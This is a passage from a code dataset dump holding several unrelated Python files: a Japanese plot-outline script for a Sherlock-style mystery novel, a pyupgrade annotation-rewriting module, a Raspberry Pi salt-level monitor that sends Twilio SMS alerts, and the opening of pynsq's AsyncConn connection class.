w.plot_note(\"$maryは市場で仕入れた面白い話を$sherlockに話す\"),\n w.plot_note(\"今市場ではガチョウからダイヤが出てくると話題になっていた\"),\n w.plot_note(\"$limeがやってきて、何か出たという\"),\n w.plot_note(\"ガチョウの中から出てきたのは血がついたナイフだった\"),\n )\n\n\ndef knife_in_the_goose(w: World):\n return w.scene(\"ガチョウの中の凶器\",\n w.plot_note(\"$sherlockはそれがなにかの事件の凶器だと分かり、すぐに警察に連絡を取る\"),\n w.plot_note(\"$restradeがやってきて、それは現在彼が追っている事件の重要な証拠品だと言われた\"),\n )\n\n\ndef restrade_talk_about_goose_knife(w: World):\n return w.scene(\"$restradeのガチョウの凶器事件の話\",\n w.plot_note(\"$restradeからその事件についての概要を聞く\"),\n w.plot_note(\"事件はある一軒家で起こった\"),\n w.plot_note(\"引退した学者が謎の死を遂げた\"),\n w.plot_note(\"刺殺だったのだが凶器が発見されず、犯人も特定されないまま現在に至る\"),\n w.plot_note(\"そのナイフを警部に渡して調べてもらう\"),\n w.plot_note(\"その間に興味をもった$sherlockは一人でその現場を調べに出ていってしまう\"),\n w.plot_note(\"後日、そのナイフからずっと失踪中の$jackの指紋が検出された\"),\n )\n\n\ndef backhome_mary_with_jack_wanted(w: World):\n return w.scene(\"$jack容疑者の話を持って返ってきた$mary\",\n w.plot_note(\"戻ってきた$sherlockは$maryからそのことを聞き、\"),\n w.plot_note(\"$sherlockは現場を見てきたことを$maryたちに話す\"),\n )\n\n\ndef talk_about_goose_case(w: World):\n return w.scene(\"ガチョウ凶器事件についての調査\",\n w.plot_note(\"現場は住宅街から少し離れた郊外の一軒家で、男は民間の研究所をやめたあとも個人的に何かを研究していた\"),\n w.plot_note(\"歴史学と民俗学に造形が深く、$sherlockもその所蔵していた資料に関心をしたくらい\"),\n w.plot_note(\"彼が書き残しているものの一つに古代の技法がいくつか紹介されていた\"),\n w.plot_note(\"刺された場所は彼の家だが、凶器は消えている\"),\n w.plot_note(\"ただし$jackとの関係性は全く見えず、彼女ならそんな手段を使わないと$sherlockは考えた\"),\n w.plot_note(\"$sherlockは誰かが$jackを表舞台に引っ張り出したい、その罠だと考える\"),\n )\n\n\ndef jacks_letter(w: World):\n return w.scene(\"$jackからの手紙\",\n w.plot_note(\"と、差出人不明の手紙に$jackからのメッセージがあった\"),\n w.plot_note(\"助けてほしいと\"),\n )\n\n\ndef sherlocks_message_for_jack(w: World):\n return w.scene(\"$sherlockのメッセージ\",\n w.plot_note(\"そこに$sherlockからの伝言を$ignesが持ってくる\"),\n w.plot_note(\"数日留守にすることと、$jackに会いに行ってくると書かれていた\"),\n )\n\n\ndef mysterious_case(w :World):\n return w.scene(\"怪奇事件\",\n w.plot_note(\"$sherlockは怪奇事件の特集記事を読みながら「こんなものは実在しない」と言う\"),\n w.plot_note(\"そもそも奇妙な現象、霊的なもの、不思議なものは人間が理解することを放棄していると説明する\"),\n w.plot_note(\"小さい頃、学校内で七不思議というものがあったが、それを全て解明したらみんなから怒られたと\"),\n )\n\n\ndef legend_of_dark_dog(w: World):\n return w.scene(\"魔獣伝説\",\n 
w.plot_note(\"そこに$wilsonがこんな話がある、と、ある孤島に伝わる魔獣伝説を話した\"),\n w.plot_note(\"そこはこの三年の間に六名もの犠牲者が出ているという\"),\n w.plot_note(\"最初は飼い犬や家畜が殺されているだけだった\"),\n w.plot_note(\"しかし最初に人の犠牲者が出た\"),\n w.plot_note(\"それはどう見ても人の手によるものではなく、何か獣による被害だった\"),\n w.plot_note(\"最初の事件から次の事件まではかなり時間が開いたが、直近はこの三ヶ月の間に二件も殺人事件が起こっている\"),\n w.plot_note(\"$sherlockはそれだけ続くなら必ず人の手が関わっていると断言する\"),\n )\n\n\ndef invitation_from_dark_island(w: World):\n return w.scene(\"孤島からの招待状\",\n w.plot_note(\"そこに招待状が届く\"),\n w.plot_note(\"$wilsonはそれを開封し、噂をしていれば、とその伝説の孤島に暮らす城主からの招待状だと言った\"),\n )\n\n\ndef commision_of_murder_case(w: World):\n return w.scene(\"殺人事件の解決依頼\",\n w.plot_note(\"$sherlockは新聞を読んでいた\"),\n w.plot_note(\"そこに殺人事件の調査依頼が持ち込まれる\"),\n w.plot_note(\"最初は$maryも驚いていたが今では慣れたもので、依頼人を案内して、飲み物を出しながら依頼内容を話すよう促す\"),\n w.plot_note(\"$maryは秘書気取りだった\"),\n w.plot_note(\"だが$sherlockは依頼人が出した名前に驚く\"),\n w.plot_note(\"それは$morianoの大学の後輩だったからだ\"),\n w.plot_note(\"犯罪学の研究をしている人間が殺された\"),\n w.plot_note(\"大学の研究室内での密室殺人。その手口が全く不明だが自殺ではないと警察は断定しているという\"),\n w.plot_note(\"さっそくその調査に向かう$sherlock\"),\n )\n\n\ndef moriano_is_here(w: World):\n return w.scene(\"$moriano見参\",\n w.plot_note(\"$sherlockが家に戻ってくるとそこには老人の姿があった\", \"$morianoだ\"),\n w.plot_note(\"$morianoは「はじめまして」と挨拶をし、それから今$sherlockたちがどういう経路で戻ってきたかを言い当てる\"),\n w.plot_note(\"$morianoは$sherlockに自分に関するすべてのことから手を引くようにと警告する\"),\n w.plot_note(\"$sherlockは$morianoがここに来ることも推測して既に逮捕する準備を整えているとブラフを張るが、彼には通用しなかった\"),\n w.plot_note(\"警察は別のところで起こった事件に駆けつけている\"),\n w.plot_note(\"$morianoは言う。すべての人間は自分の意志ではなく、環境要因によって動かされると。つまり誰でもが犯罪者になりうると\"),\n w.plot_note(\"$morianoは$maryに問いかける。彼女は$sherlockを好きだろうと\"),\n w.plot_note(\"$morianoは$limeに本心では王室に帰りたいだろうと\"),\n w.plot_note(\"$wilsonについての言及はとくないが、ここの人間には言えない本音を隠しているだろうと\"),\n w.plot_note(\"$morianoは逃げないからいつでも自分の屋敷に来るがいいと言い残して、去っていく\"),\n )\n\n\ndef marys_strange(w: World):\n return w.scene(\"奇妙な$mary\",\n w.plot_note(\"$morianoがきてから$maryの様子がおかしい\"),\n w.plot_note(\"$sherlockは$morianoを何とか見つけ出そうと躍起になっている\"),\n w.plot_note(\"$maryは$limeに相談することもできず、市場の$nowlisに愚痴る。自分だけが違う気がすると\"),\n )\n\n\ndef where_is_mary(w: World):\n return w.scene(\"$maryはどこへ?\",\n w.plot_note(\"すぐに$sherlockたちは$morianoの邸宅に向かう\"),\n )\n\n\ndef alive_moriano(w: World):\n return w.scene(\"$morianoは生きている\",\n w.plot_note(\"しかし後日、$morianoのメッセージが新聞に掲載される\"),\n w.plot_note(\"$maryは無事で丁重に監禁していると。場所は$sherlockなら推理できると書かれて、ヒントが残されていた\"),\n )\n\n\ndef morianos_whereabouts(w: World):\n return w.scene(\"$morianoの居場所\",\n w.plot_note(\"$sherlockはヒントから$maryの居場所は$morianoと関係ない場所にいると推測する\"),\n w.plot_note(\"$mary救出隊として少年探偵団の協力を仰ぐ\"),\n w.plot_note(\"その間に$sherlockはその新聞記事からたどり、$morianoがどこからメッセージを出しているのかを調べる\"),\n )\n\n\ndef vanished_sherlock(w: World):\n return w.scene(\"消えた$sherlock\",\n w.plot_note(\"$maryたちが戻ると、そこには$sherlockの姿がなかった\"),\n )\n\n\ndef sherlocks_information(w: World):\n return w.scene(\"$sherlockに関する情報\",\n w.plot_note(\"$maryが目覚めるとそこに$sherlockの姿がいなかった\"),\n w.plot_note(\"戻ってきた$wilsonは$sherlockの手がかりを追ったが見失ったと言う\"),\n w.plot_note(\"$maryは$sherlockが戻ってくると信じて待っていたが、連絡も戻ってくることもなかった\"),\n )\n\n\ndef no_sherlock_life(w: World):\n return w.scene(\"$sherlock不在の生活\",\n \"同・寝室\",\n w.plot_note(\"一月が経ち、$maryたちは$sherlockのいない生活に馴染み始めていた\"),\n )\n\n\ndef serching_sherlock(w: World):\n return w.scene(\"$sherlockの捜索隊\",\n w.plot_note(\"町では$morianoも$sherlockも消えたというのに犯罪は起こっていた\"),\n w.plot_note(\"$wilsonは手を尽くして$sherlockを探す\"),\n w.plot_note(\"$limeが王室のツテを使い、何とか情報を集めると言い出す\"),\n w.plot_note(\"少年探偵団も手を尽くした\"),\n w.plot_note(\"今まで世話になった人たちも$sherlockのことを探してくれた\"),\n w.plot_note(\"それでも情報すら見つからない\"),\n )\n\n\ndef arrived_his_message(w: 
World):\n return w.scene(\"$sherlockからのメッセージ\",\n w.plot_note(\"雨の酷いある日、一通の郵便が届く\"),\n w.plot_note(\"届いた手紙には宛名がなかったが$sherlock特有の署名が入っていた\"),\n )\n\n\ndef sadness_report(w: World):\n return w.scene(\"悲しいお知らせ\",\n w.plot_note(\"手紙の冒頭にはこう書かれていた\"),\n w.plot_note(\"この手紙が届いたならば自分はすでにこの世界にいないだろうと$sherlockは書いていた\"),\n w.plot_note(\"手紙は$morianoの隠れ家に向かう直前に書いて出したと書かれている\"),\n w.plot_note(\"$morianoは用意周到で、約束通り一人で待っていたりはしない\"),\n w.plot_note(\"$sherlockは陽動をして、手下たちを遠ざけて、可能ならば$morianoをおびき出す\"),\n w.plot_note(\"どうにか一対一で話せる場所を作る、と書いてある\"),\n w.plot_note(\"$morianoがどこまで語るか、告白するかわからないが、彼がやってきた悪事について書き残しておく\"),\n w.plot_note(\"$morianoのことは以前教えたが、大学を出たあとの彼については今回独自調査を行うまで不明な部分が多かった\"),\n w.plot_note(\"$morianoは$cultXと呼ばれる宗教団体との接触から犯罪者人生が始まる\"),\n w.plot_note(\"彼はその教義である人間の本性である「悪」を反映させようとしていた\"),\n w.plot_note(\"今までに解決した事件の裏側にはこの教団か、その教団の人間、関係者が細い糸で繋がっていた\"),\n w.plot_note(\"その大本である$morianoを何としても打ち取ると宣言されていた\"),\n w.plot_note(\"$maryたちは$sherlockがどうなったのか気になり、手紙を出した場所に向かおうとする\"),\n w.plot_note(\"だが$wilsonによりそれは止められる\"),\n w.plot_note(\"兄の$mikelがやってきて「$sherlockがなくなった」と告げた\"),\n )\n\n\n## in Empty House\ndef believed_his_alive(w: World):\n mary, lime, wil = w.get(\"mary\"), w.get(\"lime\"), w.get(\"wilson\")\n return w.scene(\"$sherlockの生存を信じて\",\n w.change_camera(\"mary\"),\n w.change_stage(KITCHEN),\n w.change_time(\"morning\"),\n w.plot_note(\"$maryたちは$sherlockが生きていると思って捜索を続けていた\"),\n w.plot_note(\"しかし何の情報もなく、ただ時間だけが過ぎていく\"),\n w.plot_note(\"家を失い、$wilsonの住まいに居候していた$maryたち\"),\n w.plot_note(\"$wilsonは忙しそうに外に出ていることが増えた\"),\n w.plot_note(\"$maryは$sherlockの手紙にヒントはないかと考えるが、何も見つからない\"),\n mary.be(\"皿洗いをしている$S\"),\n mary.think(\"もう一月も$sherlockは失踪を続けている\"),\n mary.think(\"完全に死んだものと思われていたが、$Sたちは捜索を続けていた\"),\n mary.do(\"棚には$sherlockのコップが残っている\"),\n mary.think(\"それを目にして涙が滲む\"),\n mary.think(\"でも$sherlockが送ってきたメッセージにはわざわざ自分が死んだと思ってくれと書かれていた\"),\n mary.think(\"何故そんなことを書いたのか、$Sは気になっていた\"),\n mary.talk(\"あっ\"),\n mary.do(\"$wilsonの湯呑が割れてしまう\"),\n mary.talk(\"$wilsonのだし、いいか\"),\n )\n\n\ndef news_of_sherlock_alive(w: World):\n mary, lime, wil = w.get(\"mary\"), w.get(\"lime\"), w.get(\"wilson\")\n return w.scene(\"$sherlock生存情報\",\n w.change_camera(\"mary\"),\n w.change_stage(LIVING),\n w.change_time(\"noon\"),\n w.plot_note(\"だが$limeはそこに$sherlockが生きているという証拠を見つけた\"),\n w.plot_note(\"そこに$wilsonが戻ってくる\"),\n w.plot_note(\"$wilsonは「$sherlockに似た人間を見かけた」という情報を聞いたと話した\"),\n mary.come(\"買い物を終えて帰ってきた$S\"),\n lime.be(\"$Sは家の片付けをしていた\"),\n wil.come(\"そこに$Sが興奮した様子で戻ってくる\"),\n mary.talk(\"何かあったん?\"),\n wil.talk(\"聞いてくれ\", \"いた\", \"$sherlockが、いたんだ\"),\n mary.do(\"驚きで声が出ない$S\"),\n lime.do(\"掃除の手が止まる$S\"),\n wil.talk(\"$meもまだ聞いたばかりの話で、本当かどうかの確認すらできていないんだが、それでもこれまで何の情報もなかったところにこれは大きいよ\"),\n wil.talk(\"$EastEndの空き家に夜な夜な明かりが灯る家があるそうなんだ\",\n \"どうやらそこに$sherlockによく似た人間が入っていくのを見たって、ホームレスの目撃情報があった\"),\n mary.talk(\"でもどうしてそれが$sherlockなん? 
別人の可能性はないん?\"),\n wil.talk(\"それが以前$sherlockが世話をしたホームレスで、彼のことをよく覚えていたんだよ\",\n \"遠目にもあの特徴的な寝癖頭とそこに被ったハンチング、チェック柄のコートは$sherlockに間違いないって\"),\n mary.think(\"その話に興奮する$S\"),\n mary.talk(\"場所は?\"),\n mary.do(\"荷物を置くと、$wilsonに詰め寄った\"),\n )\n\n\ndef consideration_of_sherlock(w: World):\n return w.scene(\"容疑者$sherlockについての考察\",\n # NOTE: omit?\n w.plot_note(\"一旦家に戻り、犯人にされてしまった$sherlockについて考える\"),\n w.plot_note(\"$wilsonは$sherlockが$moriano一味に騙されたというのだが\"),\n w.plot_note(\"もう一度あの空き家を訪れる\"),\n )\n\n\ndef help_from_sherlock(w: World):\n lime = w.get(\"lime\")\n wil = w.get(\"wilson\")\n ignes = w.get(\"ignes\")\n return w.scene(\"$sherlockからの救援情報\",\n w.change_camera(\"lime\"),\n w.change_stage(LIVING),\n lime.be(\"一人で$sherlockの家に戻っている$S\"),\n lime.do(\"消えた$maryを探してくるとでかけた$wilson\"),\n lime.do(\"$Sはポストに入っていた宛名のない封書を見つける\"),\n lime.do(\"そこには$maryが$morianoの手の者に捕まり、監禁されていると書かれていた\"),\n ignes.come(\"$Sがやってきて\"),\n ignes.talk(\"$mary嬢ちゃんは?\"),\n ignes.do(\"事情を聞く$S\"),\n ignes.talk(\"すぐ手配して、場所を突き止める\", \"$limeさんは警察に行って事情を説明してきて\"),\n )\n\n\ndef injured_wilson(w: World):\n return w.scene(\"負傷した$wilson\",\n # NOTE: omit/方針変更\n w.plot_note(\"家に戻ると$wilsonがいて、ひどい怪我を負っていたが、無事に逃げ出したと言う\"),\n w.plot_note(\"$maryは自分たちを助けた男が$sherlockの生存を言っていたと伝える\"),\n w.plot_note(\"$wilsonはそのホームレスのことを教えてくれと頼む\"),\n w.plot_note(\"$maryたちにここで休むようにいい、$wilsonは$sherlockを探しに出ていった\"),\n w.plot_note(\"そこに$wilsonが指名手配されたと$restradeがやってくる\"),\n )\n\n\ndef burned_shal_home(w: World):\n shal = w.get(\"sherlock\")\n wil, lime = w.get(\"wilson\"), w.get(\"lime\")\n ignes, pat = w.get(\"ignes\"), w.get(\"patson\")\n lisa = w.get(\"lisa\")\n return w.scene(\"家が燃えて\",\n w.change_camera(\"sherlock\"),\n w.change_stage(HOME),\n shal.come(\"$Sたちは$wilsonの車で火事で全焼してしまった住居前にやってくる\"),\n wil.come(),\n lime.come(),\n shal.do(\"みんな呆然としてその光景を見ている\"),\n shal.do(\"消防士たちが$magicポンプで水をかけている。少しずつ火勢は衰え、もう消火が近い\"),\n shal.do(\"近所の人も出て、野次馬が集まっている\"),\n lisa.come(\"大家の$Sがやってきて、びっくりして呆然\"),\n lisa.talk(\"な、何なんですか、これは!\"),\n shal.talk(\"ああ、$ln_lisaさん、どうもご無沙汰しています\"),\n lisa.talk(\"ねえ$sherlockさん、これは一体どういうことなのかしら\"),\n shal.talk(\"火事みたいですね。おそらく放火でしょう。迷惑なことです\"),\n lisa.talk(\"燃えたのは誰の家なの?\"),\n shal.talk(\"$meが借りていたあなたの家です\"),\n lisa.talk(\"ええ、そうよね。そうだと思ったわ\"),\n lisa.do(\"見る間に表情が変わっていく夫人\"),\n lisa.talk(\"この弁償、誰が支払ってくれるのかしら\"),\n shal.talk(\"契約上は$meに過失があった場合は$meですが、放火の責任を取れと言われても困りますから、おそらくオーナー夫人の方になるかと\"),\n lisa.talk(\"何ですって!\"),\n shal.talk(\"用事があったのを思い出したので失礼\"),\n shal.do(\"$wilsonの車に乗り込む$S\"),\n wil.do(\"仕方ない、といった感じで車に乗り込む$S\"),\n )\n\n"} {"ext": "py", "sha": "1a2ec33fff551516eb2ab280bb118cd7e8efbed2", "content": "from .bedloader import ROI\n"} {"ext": "py", "sha": "1a2ec3e6f6d257f7ceaa7fb9461283f2be172d25", "content": "from __future__ import annotations\n\nimport ast\nimport functools\nimport sys\nfrom typing import Iterable\n\nfrom tokenize_rt import NON_CODING_TOKENS\nfrom tokenize_rt import Offset\nfrom tokenize_rt import Token\n\nfrom pyupgrade._ast_helpers import ast_to_offset\nfrom pyupgrade._ast_helpers import is_name_attr\nfrom pyupgrade._data import register\nfrom pyupgrade._data import State\nfrom pyupgrade._data import TokenFunc\nfrom pyupgrade._token_helpers import CLOSING\nfrom pyupgrade._token_helpers import find_closing_bracket\nfrom pyupgrade._token_helpers import find_token\nfrom pyupgrade._token_helpers import OPENING\n\n\ndef _fix_optional(i: int, tokens: list[Token]) -> None:\n j = find_token(tokens, i, '[')\n k = find_closing_bracket(tokens, j)\n if tokens[j].line == tokens[k].line:\n tokens[k] = Token('CODE', ' | None')\n del tokens[i:j + 1]\n 
else:\n tokens[j] = tokens[j]._replace(src='(')\n tokens[k] = tokens[k]._replace(src=')')\n tokens[i:j] = [Token('CODE', 'None | ')]\n\n\ndef _fix_union(\n i: int,\n tokens: list[Token],\n *,\n arg_count: int,\n) -> None:\n depth = 1\n parens_done = []\n open_parens = []\n commas = []\n coding_depth = None\n\n j = find_token(tokens, i, '[')\n k = j + 1\n while depth:\n # it's possible our first coding token is a close paren\n # so make sure this is separate from the if chain below\n if (\n tokens[k].name not in NON_CODING_TOKENS and\n tokens[k].src != '(' and\n coding_depth is None\n ):\n if tokens[k].src == ')': # the coding token was an empty tuple\n coding_depth = depth - 1\n else:\n coding_depth = depth\n\n if tokens[k].src in OPENING:\n if tokens[k].src == '(':\n open_parens.append((depth, k))\n\n depth += 1\n elif tokens[k].src in CLOSING:\n if tokens[k].src == ')':\n paren_depth, open_paren = open_parens.pop()\n parens_done.append((paren_depth, (open_paren, k)))\n\n depth -= 1\n elif tokens[k].src == ',':\n commas.append((depth, k))\n\n k += 1\n k -= 1\n\n assert coding_depth is not None\n assert not open_parens, open_parens\n comma_depth = min((depth for depth, _ in commas), default=sys.maxsize)\n min_depth = min(comma_depth, coding_depth)\n\n to_delete = [\n paren\n for depth, positions in parens_done\n if depth < min_depth\n for paren in positions\n ]\n\n if comma_depth <= coding_depth:\n comma_positions = [k for depth, k in commas if depth == comma_depth]\n if len(comma_positions) == arg_count:\n to_delete.append(comma_positions.pop())\n else:\n comma_positions = []\n\n to_delete.sort()\n\n if tokens[j].line == tokens[k].line:\n del tokens[k]\n for comma in comma_positions:\n tokens[comma] = Token('CODE', ' |')\n for paren in reversed(to_delete):\n del tokens[paren]\n del tokens[i:j + 1]\n else:\n tokens[j] = tokens[j]._replace(src='(')\n tokens[k] = tokens[k]._replace(src=')')\n\n for comma in comma_positions:\n tokens[comma] = Token('CODE', ' |')\n for paren in reversed(to_delete):\n del tokens[paren]\n del tokens[i:j]\n\n\ndef _supported_version(state: State) -> bool:\n return (\n state.in_annotation and (\n state.settings.min_version >= (3, 10) or (\n not state.settings.keep_runtime_typing and\n 'annotations' in state.from_imports['__future__']\n )\n )\n )\n\n\ndef _any_arg_is_str(node_slice: ast.expr) -> bool:\n return (\n isinstance(node_slice, ast.Str) or (\n isinstance(node_slice, ast.Tuple) and\n any(isinstance(elt, ast.Str) for elt in node_slice.elts)\n )\n )\n\n\n@register(ast.Subscript)\ndef visit_Subscript(\n state: State,\n node: ast.Subscript,\n parent: ast.AST,\n) -> Iterable[tuple[Offset, TokenFunc]]:\n if not _supported_version(state):\n return\n\n # prevent rewriting forward annotations\n if (\n (sys.version_info >= (3, 9) and _any_arg_is_str(node.slice)) or\n (\n sys.version_info < (3, 9) and\n isinstance(node.slice, ast.Index) and\n _any_arg_is_str(node.slice.value)\n )\n ):\n return\n\n if is_name_attr(\n node.value,\n state.from_imports,\n ('typing',),\n ('Optional',),\n ):\n yield ast_to_offset(node), _fix_optional\n elif is_name_attr(node.value, state.from_imports, ('typing',), ('Union',)):\n if sys.version_info >= (3, 9): # pragma: >=3.9 cover\n node_slice = node.slice\n elif isinstance(node.slice, ast.Index): # pragma: <3.9 cover\n node_slice: ast.AST = node.slice.value\n else: # pragma: <3.9 cover\n node_slice = node.slice # unexpected slice type\n\n if isinstance(node_slice, ast.Slice): # not a valid annotation\n return\n\n if isinstance(node_slice, 
ast.Tuple):\n if node_slice.elts:\n arg_count = len(node_slice.elts)\n else:\n return # empty Union\n else:\n arg_count = 1\n\n func = functools.partial(_fix_union, arg_count=arg_count)\n yield ast_to_offset(node), func\n"} {"ext": "py", "sha": "1a2ec412040c3a5ef81d550375c59efa89b2e989", "content": "import argparse\nimport logging\nimport time\n\nimport sys\nfrom twilio.rest import Client\n\nimport settings\nimport RPi.GPIO as GPIO\n\ntwilio = Client(settings.TWILIO_PUBLIC_KEY, settings.TWILIO_SECRET_KEY)\nlog = logging.getLogger(__name__)\n\n\nclass SaltLevelMonitor(object):\n def __init__(self, force_report=False, unit=settings.METRIC, threshold=0,\n tank_depth=settings.DEFAULT_TANK_DEPTH):\n self.force_report = force_report\n self.unit = unit if unit in settings.VALID_UNITS else settings.METRIC\n self.notation = 'inches' if unit == settings.IMPERIAL else 'centimeters'\n self.threshold = float(threshold)\n self.tank_depth = float(tank_depth)\n self.distance = None\n self.remaining_salt = None\n\n def check_salt_level(self):\n self.distance = self.get_average_distance()\n self._convert_units()\n self.remaining_salt = self.tank_depth - self.distance\n message = self._get_report_message()\n log.info('Salt level is: {0:.2f} {1}'.format(self.remaining_salt, self.notation))\n if self.remaining_salt < self.threshold or self.force_report:\n log.info(message['body'])\n self.report_salt_level(message)\n\n def get_average_distance(self):\n \"\"\" used to get an average read since the sensor isn't 100% accurate \"\"\"\n reads = [self.get_distance() for _ in range(settings.READS_PER_CHECK)]\n return sum(reads) / settings.READS_PER_CHECK\n\n @staticmethod\n def get_distance():\n \"\"\" returns distance in centimeters \"\"\"\n # set Trigger to HIGH\n GPIO.output(settings.GPIO_TRIGGER, True)\n\n # set Trigger after 0.01ms to LOW\n time.sleep(0.00001)\n GPIO.output(settings.GPIO_TRIGGER, False)\n\n start_time = time.time()\n stop_time = time.time()\n\n # save StartTime\n while GPIO.input(settings.GPIO_ECHO) == 0:\n start_time = time.time()\n\n # save time of arrival\n while GPIO.input(settings.GPIO_ECHO) == 1:\n stop_time = time.time()\n\n # time difference between start and arrival\n time_elapsed = stop_time - start_time\n return (time_elapsed * settings.SPEED_OF_SOUND) / 2\n\n def _convert_units(self):\n \"\"\"\n convert distance to inches if IMPERIAL or convert tank_depth and threshold to centimeters\n \"\"\"\n if self.unit == settings.IMPERIAL:\n self.distance = self.distance / settings.CM_TO_INCHES\n else:\n self.tank_depth = self.tank_depth * settings.CM_TO_INCHES\n self.threshold = self.threshold * settings.CM_TO_INCHES\n\n def _get_report_message(self):\n message = settings.MESSAGE_TEMPLATE.copy()\n message['body'] = settings.SALT_LEVEL_ALERT_MESSAGE.format(\n self.remaining_salt, self.notation)\n if self.force_report:\n message['body'] = '{} (forced report)'.format(message['body'])\n return message\n\n @staticmethod\n def report_salt_level(message):\n twilio.messages.create(**message)\n\n def __enter__(self):\n GPIO.setmode(GPIO.BCM)\n\n # set GPIO direction (IN / OUT)\n GPIO.setup(settings.GPIO_TRIGGER, GPIO.OUT)\n GPIO.setup(settings.GPIO_ECHO, GPIO.IN)\n return self\n\n def __exit__(self, *args):\n GPIO.cleanup()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Salty Dog')\n parser.add_argument('-u',\n '--unit',\n action='store',\n dest='unit',\n default='metric',\n help='Unit of measure used in reporting')\n parser.add_argument('-t',\n '--threshold',\n 
action='store',\n dest='threshold',\n help='Threshold for reporting in inches or cm (must match --unit)')\n parser.add_argument('-d',\n '--tank-depth',\n action='store',\n dest='tank_depth',\n help='Total depth of your salt tank in inches or cm (must match --unit)')\n parser.add_argument('-f',\n '--force-report',\n action='store_true',\n dest='force_report',\n default=False,\n help='Force Salty Dog to send SMS regardless of salt level measured')\n args = parser.parse_args(sys.argv[1:])\n parsed_kwargs = {\n 'force_report': args.force_report,\n 'unit': args.unit,\n 'threshold': args.threshold,\n 'tank_depth': args.tank_depth,\n }\n with SaltLevelMonitor(**parsed_kwargs) as monitor:\n monitor.check_salt_level()\n"} {"ext": "py", "sha": "1a2ec4fda02beef4f3b97ff5f4100c3805bf6108", "content": "from __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport time\nimport socket\nimport logging\n\nfrom ._compat import bytes_types, string_types\nfrom ._compat import struct_l\nfrom .version import __version__\n\ntry:\n import ssl\nexcept ImportError:\n ssl = None # pyflakes.ignore\n\ntry:\n from .snappy_socket import SnappySocket\nexcept ImportError:\n SnappySocket = None # pyflakes.ignore\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json # pyflakes.ignore\n\nimport tornado.iostream\nimport tornado.ioloop\n\ntry:\n from tornado.simple_httpclient import _default_ca_certs as default_ca_certs\nexcept ImportError:\n # Tornado < 4\n from tornado.simple_httpclient import _DEFAULT_CA_CERTS\n\n def default_ca_certs():\n return _DEFAULT_CA_CERTS\n\nfrom nsq import event, protocol\nfrom .deflate_socket import DeflateSocket\n\nlogger = logging.getLogger(__name__)\n\n\n# states\nINIT = 'INIT'\nDISCONNECTED = 'DISCONNECTED'\nCONNECTING = 'CONNECTING'\nCONNECTED = 'CONNECTED'\n\n\nDEFAULT_USER_AGENT = 'pynsq/%s' % __version__\n\n\nclass AsyncConn(event.EventedMixin):\n \"\"\"\n Low level object representing a TCP connection to nsqd.\n\n When a message on this connection is requeued and the requeue delay\n has not been specified, it calculates the delay automatically by an\n increasing multiple of ``requeue_delay``.\n\n Generates the following events that can be listened to with\n :meth:`nsq.AsyncConn.on`:\n\n * ``connect``\n * ``close``\n * ``error``\n * ``identify``\n * ``identify_response``\n * ``auth``\n * ``auth_response``\n * ``heartbeat``\n * ``ready``\n * ``message``\n * ``response``\n * ``backoff``\n * ``resume``\n\n :param host: the host to connect to\n\n :param port: the post to connect to\n\n :param timeout: the timeout for read/write operations (in seconds)\n\n :param heartbeat_interval: the amount of time (in seconds) to negotiate\n with the connected producers to send heartbeats (requires nsqd 0.2.19+)\n\n :param requeue_delay: the base multiple used when calculating requeue delay\n (multiplied by # of attempts)\n\n :param tls_v1: enable TLS v1 encryption (requires nsqd 0.2.22+)\n\n :param tls_options: dictionary of options to pass to `ssl.wrap_socket()\n `_ as\n ``**kwargs``\n\n :param snappy: enable Snappy stream compression (requires nsqd 0.2.23+)\n\n :param deflate: enable deflate stream compression (requires nsqd 0.2.23+)\n\n :param deflate_level: configure the deflate compression level for this\n connection (requires nsqd 0.2.23+)\n\n :param output_buffer_size: size of the buffer (in bytes) used by nsqd\n for buffering writes to this connection\n\n :param output_buffer_timeout: timeout (in ms) used by nsqd before\n flushing buffered writes (set to 
0 to disable). **Warning**:\n configuring clients with an extremely low (``< 25ms``)\n ``output_buffer_timeout`` has a significant effect on ``nsqd``\n CPU usage (particularly with ``> 50`` clients connected).\n\n :param sample_rate: take only a sample of the messages being sent\n to the client. Not setting this or setting it to 0 will ensure\n you get all the messages destined for the client.\n Sample rate can be greater than 0 or less than 100 and the client\n will receive that percentage of the message traffic.\n (requires nsqd 0.2.25+)\n\n :param user_agent: a string identifying the agent for this client\n in the spirit of HTTP (default: ``/``)\n (requires nsqd 0.2.25+)\n\n :param auth_secret: a byte string passed when using nsq auth\n (requires nsqd 1.0+)\n\n :param msg_timeout: the amount of time (in seconds) that nsqd will wait\n before considering messages that have been delivered to this\n consumer timed out (requires nsqd 0.2.28+)\n\n :param hostname: a string identifying the host where this client runs\n (default: ````)\n \"\"\"\n def __init__(\n self,\n host,\n port,\n timeout=1.0,\n heartbeat_interval=30,\n requeue_delay=90,\n tls_v1=False,\n tls_options=None,\n snappy=False,\n deflate=False,\n deflate_level=6,\n user_agent=DEFAULT_USER_AGENT,\n output_buffer_size=16 * 1024,\n output_buffer_timeout=250,\n sample_rate=0,\n io_loop=None,\n auth_secret=None,\n msg_timeout=None,\n hostname=None):\n assert isinstance(host, string_types)\n assert isinstance(port, int)\n assert isinstance(timeout, float)\n assert isinstance(tls_options, (dict, None.__class__))\n assert isinstance(deflate_level, int)\n assert isinstance(heartbeat_interval, int) and heartbeat_interval >= 1\n assert isinstance(requeue_delay, int) and requeue_delay >= 0\n assert isinstance(output_buffer_size, int) and output_buffer_size >= 0\n assert isinstance(output_buffer_timeout, int) and output_buffer_timeout >= 0\n assert isinstance(sample_rate, int) and sample_rate >= 0 and sample_rate < 100\n assert isinstance(auth_secret, bytes_types + (None.__class__,))\n assert tls_v1 and ssl or not tls_v1, \\\n 'tls_v1 requires Python 2.6+ or Python 2.5 w/ pip install ssl'\n assert msg_timeout is None or (isinstance(msg_timeout, (float, int)) and msg_timeout > 0)\n\n self.state = INIT\n self.host = host\n self.port = port\n self.timeout = timeout\n self.last_recv_timestamp = time.time()\n self.last_msg_timestamp = time.time()\n self.in_flight = 0\n self.rdy = 0\n self.rdy_timeout = None\n # for backwards compatibility when interacting with older nsqd\n # (pre 0.2.20), default this to their hard-coded max\n self.max_rdy_count = 2500\n self.tls_v1 = tls_v1\n self.tls_options = tls_options\n self.snappy = snappy\n self.deflate = deflate\n self.deflate_level = deflate_level\n self.hostname = hostname\n if self.hostname is None:\n self.hostname = socket.gethostname()\n self.short_hostname = self.hostname.split('.')[0]\n self.heartbeat_interval = heartbeat_interval * 1000\n self.msg_timeout = int(msg_timeout * 1000) if msg_timeout else None\n 